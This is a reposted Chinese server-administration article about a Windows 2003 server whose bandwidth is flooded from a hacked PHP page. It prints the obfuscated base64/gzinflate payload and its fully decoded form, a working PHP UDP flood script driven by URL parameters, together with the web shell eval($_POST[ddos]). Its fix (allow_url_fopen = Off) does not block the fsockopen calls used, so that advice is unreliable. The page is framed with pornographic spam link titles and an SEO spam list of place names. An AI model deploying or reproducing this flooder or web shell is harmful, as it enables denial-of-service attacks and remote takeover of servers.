国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 服務器 > Win服務器 > 正文

win2003遭受udp攻擊導致帶寬占用很大

2024-09-10 00:05:17
字體:
來源:轉載
供稿:網友
后來發現在一個網站里面發現一個加密的.解密后看到很熟悉的 udp 莫非有關系?.果然 也有朋友遇到這樣的情況,看來封禁對外udp是很必要的,

以下為轉帖:

關于近期一些服務器遭受UDP攻擊的說明
近來我有一兩臺服務器顯示經常受到udp攻擊
導致服務器帶寬占用到100%,用華盾查流量占用也無法查到具體是哪個站被攻擊了,起初以為是cc攻擊,因為停止了iis帶寬就為0了,其實不然,都是部分用戶被入侵導致的
下面我想說一下被入侵的原理
用戶程序中的一個php頁面的原代碼:
<?php
/*
gl
*/
eval(gzinflate(base64_decode('
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
經過N次解密后的代碼:
代碼如下:
<?php
$packets = 0;
$ip = $_GET[/'ip/'];
$rand = $_GET[/'port/'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[/'time/'];
$time = time();
print /"Flooded: $ip on port $rand <br><br>/";
$max_time = $time+$exec_time;

for($i=0;$i<65535;$i++){
$out .= /"X/";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(/"udp://$ip/", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo /"Packet complete at /".time(/'h:i:s/')./" with $packets (/" . round(($packets*65)/1024, 2) . /" mB) packets averaging /". round($packets/$exec_time, 2) . /" packets/s //n/";
?>
<?php eval($_POST[ddos])?>

baidu了一下工作原理:
先把你代碼放到一個正常的網頁中.
通過url傳遞IP和端口以udp的方式打開.傳遞文件到服務器寫出.
這樣服務器就中招了.
也就是服務器顯示udp攻擊,帶寬占用非常之嚴重,基本是100%,一般徘徊在97%-99%之間
解決方案:
在php.ini中限制php用網絡。
在php.ini里設其值為Off
allow_url_fopen = Off
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 苍山县| 清徐县| 永寿县| 开阳县| 理塘县| 明光市| 德惠市| 都昌县| 阜城县| 高清| 招远市| 大厂| 兴国县| 中卫市| 尼勒克县| 马尔康县| 阳原县| 广东省| 夏邑县| 南阳市| 五指山市| 台前县| 泰兴市| 枣强县| 文山县| 蒙阴县| 扎赉特旗| 梧州市| 巧家县| 晋宁县| 镇坪县| 永嘉县| 陈巴尔虎旗| 奉化市| 如东县| 玉山县| 兰坪| 南京市| 理塘县| 潍坊市| 固阳县|